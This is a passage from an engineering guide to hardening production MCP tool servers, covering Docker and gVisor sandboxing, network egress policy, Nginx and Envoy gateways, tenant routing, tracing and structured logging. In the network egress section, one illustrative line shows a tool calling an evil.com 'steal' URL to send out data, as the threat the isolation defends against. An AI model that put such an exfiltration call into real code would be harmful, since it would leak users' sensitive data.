            "--security-opt", "no-new-privileges",  # Prevent privilege escalation
            "--cap-drop", "ALL",                    # Drop all Linux capabilities
            # Working directory
            "-w", self.config.workspace_dir,
        ]
        # Inject variables into the container with -e. Passing env= to subprocess.run
        # would only change the environment of the docker CLI itself.
        for key, value in (env or {}).items():
            docker_cmd += ["-e", f"{key}={value}"]
        # Image and command: passed as a list, so there is no shell interpolation
        docker_cmd += [self.config.image] + command

        try:
            result = subprocess.run(
                docker_cmd,
                capture_output=True,
                text=True,
                timeout=self.config.timeout_seconds,
            )
            return {
                "tool": tool_name,
                "container": container_name,
                "exit_code": result.returncode,
                "stdout": result.stdout[:10000],    # Truncate output to avoid log explosion
                "stderr": result.stderr[:10000],
                "killed_by_timeout": False,
            }
        except subprocess.TimeoutExpired:
            # Force-kill the container on timeout
            subprocess.run(["docker", "rm", "-f", container_name],
                          capture_output=True)
            return {
                "tool": tool_name,
                "container": container_name,
                "exit_code": -1,
                "stdout": "",
                "stderr": "",
                "killed_by_timeout": True,
            }

The sandbox base image Dockerfile:

# Dockerfile.sandbox — MCP tool sandbox base image
FROM python:3.12-slim

# Create non-root user (never run as root inside the container)
RUN groupadd -r sandbox && useradd -r -g sandbox -d /workspace sandbox

# Working directory
RUN mkdir -p /workspace && chown sandbox:sandbox /workspace

# Install minimal dependencies required for tool execution (add only what you need)
RUN pip install --no-cache-dir requests==2.31.0

# Switch to non-root user
USER sandbox
WORKDIR /workspace

# Default command: do nothing (arguments passed to docker run replace CMD entirely)
CMD ["python", "-c", "pass"]

Option 2: gVisor (for higher isolation requirements)

For high-security scenarios—multi-tenant SaaS platforms, financial services, healthcare—Docker's shared-kernel isolation may not be sufficient. Containers share the host Linux kernel; a kernel vulnerability could be exploited to escape the container.

gVisor (open-sourced by Google) provides a user-space kernel that sits between the container and the host kernel, adding an additional isolation layer:

┌─────────────────────────────────────┐
│         Tool process (Python)        │
├─────────────────────────────────────┤
│      gVisor user-space kernel        │  ← Sentry (syscall interception)
├─────────────────────────────────────┤
│         Host Linux kernel            │  ← Real kernel
└─────────────────────────────────────┘

Using gVisor is nearly identical to Docker—just add --runtime=runsc:

# Use gVisor runtime instead of Docker's default runc
docker run --runtime=runsc --rm \
    --cpus="0.5" --memory="256m" \
    --network=none \
    --read-only \
    mcp-sandbox:latest \
    python -c "print('hello from gVisor sandbox')"

In the Python sandbox executor, switching runtimes is a single configuration parameter:

# Add gVisor support to sandbox_executor.py
class DockerSandboxExecutor:
    def __init__(self, config: SandboxConfig = SandboxConfig(),
                 runtime: str = "runc"):  # "runc" | "runsc"
        self.config = config
        self.runtime = runtime

    def _build_docker_cmd(self, command: list) -> list:
        cmd = ["docker", "run", "--rm"]
        if self.runtime == "runsc":
            cmd += ["--runtime", "runsc"]
        # ... rest of the command building
        return cmd

Network egress control

Most MCP tools don't need external network access. If a tool calls requests.get("https://evil.com/steal?data=..."), sensitive data could be exfiltrated. Network control strategy:

| Policy Level | Docker Flag | Effect | Use Case |
|---|---|---|---|
| Air-gapped | --network=none | Only a loopback interface inside the container; no connectivity to the host, other containers, or the internet | File ops, local computation, pure data processing tools |
| Internal only | --network=mcp-internal | Can only reach a specific internal Docker network; no internet egress | Tools that need internal APIs or databases |
| Allowlist | Custom iptables rules | Only specific IPs or domains reachable | Tools calling specific external APIs (e.g., weather service) |
| Unrestricted | --network=bridge | Container has full internet access | Not recommended for production MCP tools |

The default policy should be --network=none. Only a small subset of tools that genuinely require network access should be allowlisted for restricted networking.
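A default-deny policy like this can be expressed as a small lookup that the executor consults when building the docker run command. The sketch below is illustrative only: `NetworkPolicy`, `TOOL_NETWORK_POLICY`, and `network_flag` are hypothetical names, and the `mcp-internal` network is assumed to already exist.

```python
from enum import Enum


class NetworkPolicy(Enum):
    """Hypothetical policy names mapped to the value of Docker's --network flag."""
    AIR_GAPPED = "none"
    INTERNAL_ONLY = "mcp-internal"  # assumed to be created with `docker network create --internal`


# Only tools listed here get any network; everything else is air-gapped.
TOOL_NETWORK_POLICY = {
    "query_db": NetworkPolicy.INTERNAL_ONLY,
}


def network_flag(tool_name: str) -> str:
    """Return the --network flag for a tool, defaulting to no network."""
    policy = TOOL_NETWORK_POLICY.get(tool_name, NetworkPolicy.AIR_GAPPED)
    return f"--network={policy.value}"
```

Keeping the allowlist explicit means a newly added tool gets no network until someone deliberately grants it.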

Resource limits per tool call (cgroups)

Even with sandbox isolation, an unbounded tool call can exhaust the host's CPU and memory. The executor above enforces hard limits on three resources:

  • CPU: --cpus=0.5 caps the container at half a CPU core. A runaway computation can't starve other tools.
  • Memory: --memory=256m with --memory-swap=256m disables swap. The container gets OOM-killed rather than pushing the host into swap thrashing.
  • Time: timeout_seconds=30 enforced by subprocess.run(timeout=...). On timeout, the container is force-removed with docker rm -f.

For high-throughput scenarios, tune these per tool category. A query_metrics tool might need 128 MB and 5 seconds; a run_benchmark tool might need 1 GB and 120 seconds. Store these as per-tool configs, not global defaults.
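One way to store per-tool limits is a small table of resource profiles with a conservative fallback. This is a sketch under assumptions: `ToolLimits`, `TOOL_LIMITS`, and `limits_for` are hypothetical names, the memory and timeout values restate the examples above, and the CPU share is left at the default because the text does not specify one per tool.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ToolLimits:
    """Hypothetical per-tool resource profile (not part of any MCP SDK)."""
    cpus: float = 0.5
    memory_mb: int = 256
    timeout_seconds: int = 30

    def docker_flags(self) -> list[str]:
        # Setting --memory-swap equal to --memory keeps the container off swap.
        mem = f"{self.memory_mb}m"
        return [f"--cpus={self.cpus}", f"--memory={mem}", f"--memory-swap={mem}"]


DEFAULT_LIMITS = ToolLimits()

TOOL_LIMITS = {
    "query_metrics": ToolLimits(memory_mb=128, timeout_seconds=5),
    "run_benchmark": ToolLimits(memory_mb=1024, timeout_seconds=120),
}


def limits_for(tool_name: str) -> ToolLimits:
    """Look up a tool's limits, falling back to the conservative default."""
    return TOOL_LIMITS.get(tool_name, DEFAULT_LIMITS)
```

The executor would append `limits_for(name).docker_flags()` to its command and pass `timeout_seconds` to `subprocess.run`.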

Comparison: no-sandbox vs Docker vs gVisor

| Dimension | No Sandbox | Docker (runc) | gVisor (runsc) |
| --- | --- | --- | --- |
| Process Isolation | ❌ None: tool runs directly in host process space | ✅ Namespace + cgroups isolation | ✅ User-space kernel isolation, stronger |
| Filesystem Isolation | ❌ Can read/write all host files (per process user) | ✅ Read-only rootfs + tmpfs, independent filesystem view | ✅ Same as Docker, plus syscall filtering |
| Network Isolation | ❌ Full host network access | ✅ --network=none or custom network policy | ✅ Same as Docker, plus gVisor's own user-space network stack |
| Resource Limits | ❌ None: one tool can exhaust host resources | ✅ CPU/memory cgroups hard limits | ✅ Same as Docker; extra runtime overhead that grows with syscall- and I/O-heavy workloads |
| Kernel Exploit Defense | ❌ Kernel vulns directly threaten the host | ⚠️ Shared host kernel; kernel vulns can break out | ✅ User-space kernel intercepts syscalls; kernel exploits much harder |
| Startup Latency | ✅ None | ✅ ~100–500ms | ⚠️ ~200–800ms (extra user-space kernel init) |
| Ops Complexity | ✅ No extra components | ✅ Docker engine (near-universal) | ⚠️ Requires installing runsc and registering it as a container runtime |
| Recommended For | Dev environments only, personal tools | Default production choice | Multi-tenant SaaS, fintech, healthcare compliance |

Production recommendation: start with Docker. Docker's namespace + cgroups isolation is sufficient for most production scenarios in which the tool code is written and reviewed by your own team. Upgrade to gVisor when you're serving multiple external customers, executing highly untrusted user code (e.g., user-uploaded scripts), or operating under regulatory compliance requirements (PCI-DSS, HIPAA, SOC 2).

For more on Agent tool design and framework implementation:

  • Agent Tool Design Best Practices — 8 Rules from Production
  • Building an Agent Framework from Scratch — Tools, Memory, and Planning

5. Multi-Server Routing and Gateway Architecture

One MCP Server isn't enough—you need an MCP gateway

A single MCP Server exposing one set of tools only handles the simplest scenarios. As your Agent platform grows, real-world architecture demands:

  • Multiple MCP Servers each managing tools for different domains—filesystem, database, third-party APIs (Slack, GitHub, Jira)
  • A single entry point—clients should know one MCP endpoint, not N different ones
  • Tool-based routing—calling search_files automatically routes to the filesystem Server; calling query_db routes to the database Server
  • Tenant isolation—requests from different tenants route to different backend instances with fully isolated data and resources

This is the job of an MCP gateway.

Nginx multi-MCP gateway configuration

For most teams, Nginx as an MCP gateway is a lightweight, battle-tested solution. Route requests to different MCP Server backends by URL path:

# nginx-mcp-gateway.conf — MCP multi-server gateway configuration
# Unified entry point: https://mcp-gateway.example.com

# Filesystem MCP Server backend (internal port 3001)
upstream mcp_filesystem {
    server 127.0.0.1:3001 weight=1 max_fails=3 fail_timeout=30s;
    server 127.0.0.1:3011 weight=1 max_fails=3 fail_timeout=30s;  # Second active instance (add "backup" to make it a standby)
    keepalive 32;
}

# Database MCP Server backend (internal port 3002)
upstream mcp_database {
    least_conn;  # Least-connections LB — database operations have high variance in duration
    server 127.0.0.1:3002 weight=1 max_fails=3 fail_timeout=30s;
    server 127.0.0.1:3012 weight=1 max_fails=3 fail_timeout=30s;
    keepalive 16;
}

# Slack/GitHub third-party API MCP Server (internal port 3003)
upstream mcp_integrations {
    ip_hash;  # IP hash — maintain session stickiness for the same client
    server 127.0.0.1:3003 weight=1 max_fails=3 fail_timeout=30s;
    server 127.0.0.1:3013 weight=1 max_fails=3 fail_timeout=30s;
    keepalive 16;
}

server {
    listen 443 ssl http2;
    server_name mcp-gateway.example.com;

    # TLS configuration (same as earlier)
    ssl_certificate     /etc/ssl/certs/mcp-gateway.example.com.pem;
    ssl_certificate_key /etc/ssl/private/mcp-gateway.example.com.key;
    ssl_protocols       TLSv1.2 TLSv1.3;

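    # === Route by URL path to different MCP Servers ===
    # proxy_pass below has no URI part, so each backend receives the original
    # request path (for example /mcp/filesystem) unchanged.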

    # Filesystem tools: /mcp/filesystem → mcp_filesystem backend
    location /mcp/filesystem {
        proxy_pass http://mcp_filesystem;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-MCP-Tool-Category "filesystem";
        proxy_set_header Connection "";
        proxy_buffering off;  # Stream SSE responses to the client instead of buffering them
        proxy_read_timeout 120s;
        proxy_send_timeout 120s;
    }

    # Database tools: /mcp/database → mcp_database backend
    location /mcp/database {
        proxy_pass http://mcp_database;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-MCP-Tool-Category "database";
        proxy_set_header Connection "";
        proxy_buffering off;  # Stream SSE responses to the client instead of buffering them
        proxy_read_timeout 300s;  # Database queries can be slow
        proxy_send_timeout 300s;
    }

    # Third-party integrations: /mcp/integrations → mcp_integrations backend
    location /mcp/integrations {
        proxy_pass http://mcp_integrations;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-MCP-Tool-Category "integrations";
        proxy_set_header Connection "";
        proxy_buffering off;  # Stream SSE responses to the client instead of buffering them
        proxy_read_timeout 180s;
        proxy_send_timeout 180s;
    }

    # Tool discovery endpoint: aggregate all backends' tool lists
    location /mcp/discovery {
        proxy_pass http://127.0.0.1:3000;  # Tool registry service
        proxy_http_version 1.1;
        proxy_set_header Host $host;
    }

    # Health check
    location /health {
        default_type application/json;  # Sets Content-Type for the body returned below
        return 200 '{"status":"ok","gateway":"mcp-gateway"}\n';
    }
}

Tool registry and discovery pattern

With multiple MCP Server backends, how does a client discover "what tools are available"? Answer: a tool registry—a lightweight HTTP service that aggregates tool lists from all MCP Server backends:

# tool_registry.py — MCP tool registry and discovery service
import httpx
import asyncio
from typing import Dict, List

class ToolRegistry:
    """Aggregates tool lists from multiple MCP Servers,
    providing a unified tool discovery endpoint."""

    # Registered backend MCP Servers
    BACKENDS = {
        "filesystem":   "http://127.0.0.1:3001",
        "database":     "http://127.0.0.1:3002",
        "integrations": "http://127.0.0.1:3003",
    }

    def __init__(self):
        self.tool_index: Dict[str, dict] = {}  # tool_name → {backend, schema, ...}
        self.client = httpx.AsyncClient(timeout=10.0)

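    async def refresh(self):
        """Pull tool lists from all backends and build an aggregated index."""
        # Build into a fresh dict and swap it in at the end, so lookups never
        # see a half-built index while a refresh is running.
        new_index: Dict[str, dict] = {}
        for backend_name, backend_url in self.BACKENDS.items():
            try:
                # Call each backend's tools/list endpoint.
                # Simplified: a Streamable HTTP server may require an initialize
                # handshake first and may answer with an SSE stream instead of JSON.
                resp = await self.client.post(
                    f"{backend_url}/mcp",
                    json={
                        "jsonrpc": "2.0",
                        "id": 1,
                        "method": "tools/list",
                        "params": {}
                    },
                    headers={"Accept": "application/json, text/event-stream"},
                )
                resp.raise_for_status()  # Treat HTTP errors like an unreachable backend
                data = resp.json()
                tools = data.get("result", {}).get("tools", [])
                for tool in tools:
                    if tool["name"] in new_index:
                        # Two backends expose the same tool name; keep the first one
                        print(f"[REGISTRY] Duplicate tool {tool['name']} from {backend_name} ignored")
                        continue
                    tool["_backend"] = backend_name
                    tool["_backend_url"] = backend_url
                    new_index[tool["name"]] = tool
            except Exception as e:
                print(f"[REGISTRY] Backend {backend_name} unreachable: {e}")
        self.tool_index = new_index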

    def get_tool_backend(self, tool_name: str) -> str | None:
        """Look up the backend URL for a given tool name."""
        tool = self.tool_index.get(tool_name)
        return tool["_backend_url"] if tool else None

    def list_all_tools(self) -> List[dict]:
        """Return all registered tools across all backends."""
        return list(self.tool_index.values())

The tool discovery flow:

  1. On startup: ToolRegistry sends tools/list requests to all backends, building an aggregated tool index.
  2. Client requests tool list: The gateway's /mcp/discovery endpoint returns the aggregated list of all tools.
  3. Tool call routing: When a client invokes a tool, the gateway looks up the tool name in the registry and forwards the request to the corresponding backend server.
  4. Periodic refresh: Re-pull tool lists every 60 seconds so newly added or removed tools show up within about a minute.
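The periodic refresh in step 4 can be sketched as a background asyncio task. The helper names `refresh_forever` and `stop_refresh` are hypothetical; the only assumption about the registry is that it exposes an async `refresh()` method like the one above.

```python
import asyncio
import contextlib


async def refresh_forever(registry, interval_seconds: float = 60.0) -> None:
    """Call registry.refresh() on a fixed interval until the task is cancelled."""
    while True:
        try:
            await registry.refresh()
        except Exception as exc:
            # One failed refresh should not stop the loop; the old index stays in use.
            print(f"[REGISTRY] refresh failed: {exc}")
        await asyncio.sleep(interval_seconds)


async def stop_refresh(task: asyncio.Task) -> None:
    """Cancel the background task and wait for it to finish."""
    task.cancel()
    with contextlib.suppress(asyncio.CancelledError):
        await task
```

At startup the service would run `task = asyncio.create_task(refresh_forever(registry))` and call `await stop_refresh(task)` during shutdown.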

Load balancing strategies

Different tool categories have different load characteristics. Nginx supports multiple load balancing algorithms—choose per upstream:

| Strategy | Nginx Directive | Best For | Example Tool Categories |
| --- | --- | --- | --- |
| Round Robin | (default; no directive) | Uniform load distribution; all requests cost roughly the same | File ops, simple queries, config reads |
| Least Connections | least_conn; | Operations with high variance in duration; avoids stacking slow requests on one backend | Database queries, data migrations |
| IP Hash | ip_hash; | Session stickiness: same client always hits same backend | Stateful integrations (Slack, Jira) |
| Weighted | server ... weight=N; | Backends with different capacity (e.g., some instances on larger EC2/GCE types) | Mixed-instance pools during scaling events |
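To make the difference between the first two strategies concrete, here is a toy model of the selection logic. It is only an illustration of the idea, not how Nginx implements it, and the function names are hypothetical.

```python
from itertools import cycle


def round_robin(backends: list[str]):
    """Return an iterator that rotates through backends, ignoring current load."""
    return cycle(backends)


def least_connections(active: dict[str, int]) -> str:
    """Pick the backend with the fewest in-flight requests."""
    return min(active, key=active.get)
```

With one backend stuck on three slow queries and another handling one, round robin still alternates between them, while least connections sends the next request to the less loaded backend.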

Tenant-aware routing

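In multi-tenant scenarios, different tenants' requests must route to separate backend instances to ensure data and resource isolation. One way to do this is to route on a tenant identifier header. That header must be set or verified by the authentication layer; a raw client-supplied value would let any caller select another tenant's backend: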

# Nginx gateway: route by tenant header to different backends
map $http_x_tenant_id $tenant_backend {
    "tenant-a"    "mcp_tenant_a";
    "tenant-b"    "mcp_tenant_b";
    default       "mcp_default";
}

upstream mcp_tenant_a {
    server 127.0.0.1:3101;
    keepalive 16;
}

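upstream mcp_tenant_b {
    server 127.0.0.1:3102;
    keepalive 16;
}

# Fallback pool referenced by the map's default entry (example port; adjust to your setup)
upstream mcp_default {
    server 127.0.0.1:3100;
    keepalive 16;
}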

server {
    listen 443 ssl http2;
    server_name mcp-gateway.example.com;

    location /mcp {
        proxy_pass http://$tenant_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Tenant-ID $http_x_tenant_id;  # Forward tenant ID to backend
        proxy_set_header Connection "";
        proxy_buffering off;  # Stream SSE responses to the client instead of buffering them
        proxy_read_timeout 300s;
    }
}

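Requests carry X-Tenant-ID: tenant-a in their headers, and Nginx routes each request to the corresponding backend based on this value. Each tenant gets its own MCP Server instance, its own Docker sandbox resource pool, and its own database connection. This prevents cross-tenant data leakage only if the tenant ID is derived from the authenticated identity (for example, a claim in the OAuth access token) rather than trusted as sent by the client.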
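A minimal sketch of that check, assuming the auth layer has already validated the access token and exposes its claims as a mapping. The claim name `tenant_id` and the names `resolve_tenant` and `TenantMismatchError` are assumptions for illustration, not part of MCP or OAuth.

```python
from typing import Mapping, Optional


class TenantMismatchError(Exception):
    """Raised when the requested tenant does not match the authenticated one."""


def resolve_tenant(verified_claims: Mapping[str, str],
                   header_tenant: Optional[str]) -> str:
    """Return the tenant to route to, trusting only the verified token claims."""
    token_tenant = verified_claims.get("tenant_id")  # hypothetical claim name
    if not token_tenant:
        raise TenantMismatchError("token carries no tenant claim")
    if header_tenant is not None and header_tenant != token_tenant:
        # The client asked for a tenant it is not authenticated for.
        raise TenantMismatchError("X-Tenant-ID does not match the authenticated tenant")
    return token_tenant
```

The gateway or auth middleware would then overwrite X-Tenant-ID with the returned value before the request reaches the routing rule.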

Envoy: the next level for programmable MCP gateways

If your team runs a service mesh on AWS (ECS Service Connect or App Mesh) or GCP (Cloud Service Mesh, formerly Anthos Service Mesh and Traffic Director), Envoy is the proxy underneath. For MCP gateways specifically, Envoy offers:

  • xDS dynamic configuration—update routing rules without reloading the gateway, critical for zero-downtime operations.
  • Native gRPC and HTTP/2 support—if your MCP Server implementations use gRPC for internal service-to-service communication alongside JSON-RPC for client-facing endpoints.
  • WASM plugin extensibility—write custom MCP protocol filters in Rust, Go, or C++ without forking Envoy.
  • Rich observability—native OpenTelemetry integration, detailed per-request metrics (upstream connect time, retries, circuit breaker state).

An Envoy-based MCP gateway configuration (envoy.yaml excerpt):

# envoy-mcp-gateway.yaml — Envoy MCP multi-server gateway (excerpt)
static_resources:
  listeners:
  - name: mcp_gateway_listener
    address:
      socket_address: { address: 0.0.0.0, port_value: 443 }
    filter_chains:
    - transport_socket:
        name: envoy.transport_sockets.tls
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.transport_sockets.tls.v3.DownstreamTlsContext
          common_tls_context:
            tls_certificates:
            - certificate_chain: { filename: "/etc/certs/mcp-gateway.pem" }
              private_key: { filename: "/etc/certs/mcp-gateway.key" }
      filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
          stat_prefix: mcp_gateway
          route_config:
            name: mcp_routes
            virtual_hosts:
            - name: mcp_backends
              domains: ["mcp-gateway.example.com"]
              routes:
              # Filesystem tools → filesystem cluster
              - match: { prefix: "/mcp/filesystem" }
                route: { cluster: mcp_filesystem, timeout: 120s }
              # Database tools → database cluster
              - match: { prefix: "/mcp/database" }
                route: { cluster: mcp_database, timeout: 300s }
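              # Integrations → integrations cluster (RING_HASH needs a hash policy;
              # here requests are hashed on the client source IP)
              - match: { prefix: "/mcp/integrations" }
                route:
                  cluster: mcp_integrations
                  timeout: 180s
                  hash_policy:
                  - connection_properties: { source_ip: true }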
              # Tool discovery → registry cluster
              - match: { prefix: "/mcp/discovery" }
                route: { cluster: mcp_registry, timeout: 30s }
          http_filters:
          - name: envoy.filters.http.router
            typed_config:
              "@type": type.googleapis.com/envoy.extensions.filters.http.router.v3.Router

  clusters:
  - name: mcp_filesystem
    connect_timeout: 5s
    type: STRICT_DNS
    lb_policy: ROUND_ROBIN
    load_assignment:
      cluster_name: mcp_filesystem
      endpoints:
      - lb_endpoints:
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3001 }}}
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3011 }}}
  - name: mcp_database
    connect_timeout: 5s
    type: STRICT_DNS
    lb_policy: LEAST_REQUEST
    load_assignment:
      cluster_name: mcp_database
      endpoints:
      - lb_endpoints:
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3002 }}}
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3012 }}}
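  - name: mcp_integrations
    connect_timeout: 5s
    type: STRICT_DNS
    lb_policy: RING_HASH
    load_assignment:
      cluster_name: mcp_integrations
      endpoints:
      - lb_endpoints:
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3003 }}}
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3013 }}}
  # Registry cluster referenced by the /mcp/discovery route
  - name: mcp_registry
    connect_timeout: 5s
    type: STRICT_DNS
    lb_policy: ROUND_ROBIN
    load_assignment:
      cluster_name: mcp_registry
      endpoints:
      - lb_endpoints:
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3000 }}}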

For teams already on AWS ECS with App Mesh or GCP with Traffic Director, Envoy is the natural MCP gateway choice: it integrates directly with your existing service mesh and cloud monitoring stack (CloudWatch or Cloud Monitoring). For smaller deployments without a service mesh, Nginx remains the simpler option and covers the static, path-based routing shown earlier.

For more background on Agent frameworks and multi-agent patterns:

  • Building an Agent Framework from Scratch — Tools, Memory, and Planning
  • Multi-Agent Debate — Let AI Agents Challenge Each Other

6. Monitoring, Logging and Observability

An invisible MCP Server is an unreliable MCP Server

After security hardening and gateway routing, the third essential production capability is observability—you must know:

  • How many clients are currently connected?
  • Which tools are called the most? Which are never called?
  • What's the average tool call response time? Has it suddenly degraded?
  • How many authentication failures today? Is someone brute-forcing API keys?
  • Is server process memory growing continuously (memory leak)?

Without this data, your MCP Server is a black box—you only learn about problems when users complain. This section builds the MCP observability triad: distributed tracing, structured logging, and metrics monitoring.

OpenTelemetry JSON-RPC distributed tracing

MCP is built on JSON-RPC 2.0—every tool call is an RPC invocation. OpenTelemetry is the CNCF standard for cloud-native observability. We can write middleware that automatically creates a Span for every JSON-RPC request:

# otel_middleware.py — OpenTelemetry JSON-RPC tracing middleware
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.semconv.trace import SpanAttributes
from opentelemetry.trace import Status, StatusCode
import time
import functools

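# Initialize OpenTelemetry (load config from env vars in production)
from opentelemetry.sdk.resources import Resource

# service.name is what tracing backends use to group spans; without it the
# SDK reports the service as "unknown_service".
trace.set_tracer_provider(
    TracerProvider(resource=Resource.create({"service.name": "mcp-server"}))
)
otlp_exporter = OTLPSpanExporter(
    endpoint="http://localhost:4317",  # Local OTLP Collector, which forwards to X-Ray, Cloud Trace, Honeycomb, etc.
    insecure=True,                     # Plaintext gRPC; acceptable only for a local collector
)
trace.get_tracer_provider().add_span_processor(
    BatchSpanProcessor(otlp_exporter)
)

tracer = trace.get_tracer("mcp-server", "1.0.0")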


def trace_jsonrpc(method: str):
    """JSON-RPC method tracing decorator.
    Creates an OpenTelemetry Span for every MCP JSON-RPC method call,
    automatically recording call parameters, execution time, and exceptions.

    Usage:
        @trace_jsonrpc("tools/call")
        async def handle_tool_call(request_id, params):
            ...
    """
    def decorator(func):
        @functools.wraps(func)
        async def wrapper(request_id, params, *args, **kwargs):
            span_name = f"mcp.{method}"

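            with tracer.start_as_current_span(
                span_name,
                kind=trace.SpanKind.SERVER,
                attributes={
                    SpanAttributes.RPC_SYSTEM: "jsonrpc",
                    SpanAttributes.RPC_METHOD: method,
                    SpanAttributes.RPC_JSONRPC_REQUEST_ID: str(request_id),
                    "mcp.tool.name": params.get("name", "unknown"),
                },
                # The except block below records the exception and status itself;
                # turn off the automatic recording to avoid duplicate events.
                record_exception=False,
                set_status_on_exception=False,
            ) as span: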
                start_time = time.time()
                try:
                    result = await func(request_id, params, *args, **kwargs)
                    duration_ms = (time.time() - start_time) * 1000

                    # Record success metrics on the span
                    span.set_attribute("mcp.duration_ms", duration_ms)
                    span.set_attribute("mcp.status", "success")
                    span.set_status(Status(StatusCode.OK))

                    return result

                except Exception as e:
                    duration_ms = (time.time() - start_time) * 1000

                    # Record error details on the span
                    span.set_attribute("mcp.duration_ms", duration_ms)
                    span.set_attribute("mcp.status", "error")
                    span.set_attribute("mcp.error.type", type(e).__name__)
                    span.set_attribute("mcp.error.message", str(e)[:500])
                    span.set_status(Status(StatusCode.ERROR, str(e)))
                    span.record_exception(e)

                    raise
        return wrapper
    return decorator


# ========== Usage example ==========

@trace_jsonrpc("tools/call")
async def handle_tool_call(request_id: str, params: dict):
    """MCP tools/call handler — automatically traces every tool invocation."""
    tool_name = params.get("name")
    tool_args = params.get("arguments", {})

    # Actual tool execution logic...
    result = await execute_tool(tool_name, tool_args)

    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "result": {
            "content": [{"type": "text", "text": str(result)}]
        }
    }

What this middleware gives you:

  • Automatic Span creation: Every JSON-RPC call generates a Span with full metadata—tool name, request ID, method type.
  • Automatic exception recording: Any thrown exception is captured, recorded on the Span, and annotated with error type.
  • Performance data: Duration (milliseconds) is recorded on every call. In Honeycomb, Datadog APM, or Grafana Tempo, you can directly see the latency distribution of your call chain—and cross-reference with logs using request_id.

The OTLP exporter endpoint in the code above points to localhost:4317. In a cloud deployment, point it to:

  • AWS: AWS Distro for OpenTelemetry Collector → X-Ray
  • GCP: OpenTelemetry Collector → Cloud Trace
  • Honeycomb: Direct OTLP ingest at https://api.honeycomb.io
  • Datadog: OTLP ingest via Datadog Agent or direct intake

Structured JSON logging

MCP Server logs must be structured—plain text logs are nearly useless for troubleshooting at scale. Output every log line as JSON:

# structured_logging.py — MCP Server structured logging configuration
import json
import logging
import sys
from datetime import datetime, timezone

class MCPJsonFormatter(logging.Formatter):
    """Outputs JSON-formatted structured logs for easy
    aggregation and querying in log platforms (CloudWatch, ELK, Loki, Datadog)."""

    def format(self, record: logging.LogRecord) -> str:
        # Use the time the record was created, not the time it is formatted
        timestamp = datetime.fromtimestamp(record.created, tz=timezone.utc)
        log_entry = {
            "timestamp": timestamp.isoformat(timespec="milliseconds").replace("+00:00", "Z"),
            "level": record.levelname,
            "logger": record.name,
            "message": record.getMessage(),
            "module": record.module,
            "function": record.funcName,
            "line": record.lineno,
        }

        # Inject additional context fields (if provided via extra_fields)
        extra_fields = getattr(record, "extra_fields", {})
        log_entry.update(extra_fields)

        # Include exception info if present
        if record.exc_info:
            log_entry["exception"] = self.formatException(record.exc_info)

        # default=str keeps one non-serializable extra field from dropping the whole line
        return json.dumps(log_entry, ensure_ascii=False, default=str)


def get_mcp_logger(name: str) -> logging.Logger:
    """Get an MCP Logger pre-configured for JSON output.

    Usage:
        logger = get_mcp_logger("mcp.tool.filesystem")
        logger.info("Tool call completed", extra={
            "extra_fields": {
                "tool": "search_files",
                "user": "user-123",
                "duration_ms": 42,
                "sandbox_id": "abc12345"
            }
        })
    """
    logger = logging.getLogger(name)
    logger.setLevel(logging.INFO)
    logger.propagate = False  # Don't propagate to root logger to avoid duplicates

    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(MCPJsonFormatter())

    # Ensure no duplicate handlers
    if not logger.handlers:
        logger.addHandler(handler)

    return logger

A typical MCP tool call log line looks like:

{
  "timestamp": "2026-05-17T10:32:15.421Z",
  "level": "INFO",
  "logger": "mcp.tool.filesystem",
  "message": "Tool call completed",
  "module": "filesystem_server",
  "function": "handle_tool_call",
  "line": 87,
  "tool": "search_files",
  "user": "user-123",
  "duration_ms": 42,
  "sandbox_id": "abc12345",
  "exit_code": 0
}

With structured logs, in CloudWatch Logs Insights, ELK, Loki, or Datadog Logs, you can filter and aggregate by fields like tool, user, duration_ms directly, with no regex parsing of log text. In CloudWatch Logs Insights, for example, the query filter level = "ERROR" | stats count(*) by tool shows which tools are failing the most.
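The same aggregation is easy to reproduce locally, which is handy for checking a log file before it reaches a log platform. This is a small sketch; `count_errors_by_tool` is a hypothetical helper, and it assumes the field names from the example log line above.

```python
import json
from collections import Counter
from typing import Iterable


def count_errors_by_tool(lines: Iterable[str]) -> Counter:
    """Count ERROR-level log entries per tool, skipping lines that are not JSON objects."""
    counts: Counter = Counter()
    for line in lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # plain-text or truncated line
        if isinstance(entry, dict) and entry.get("level") == "ERROR":
            counts[entry.get("tool", "unknown")] += 1
    return counts
```

Calling `count_errors_by_tool(open("mcp.log"))` and then `.most_common(5)` lists the five tools with the most errors; the file name here is only an example.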

Health check endpoint (Kubernetes probes)

In production, Kubernetes or your load balancer needs to periodically probe whether the MCP Server is healthy. A proper health check endpoint should not just return 200 OK—it should verify that critical dependencies are functional:

# health_check.py — MCP Server health check endpoint (K8s-compatible)
from starlette.responses import JSONResponse
import asyncio
import time

# Global state
_server_start_time = time.time()

async def health_check(request):
    """Deep health check.
    Checks:
    1. MCP Server process is running (basic liveness)
    2. Tool registry is reachable (dependency service)
    3. Docker sandbox engine is functional (runtime dependency)
    """
    checks = {
        "server": "ok",
        "uptime_seconds": int(time.time() - _server_start_time),
    }

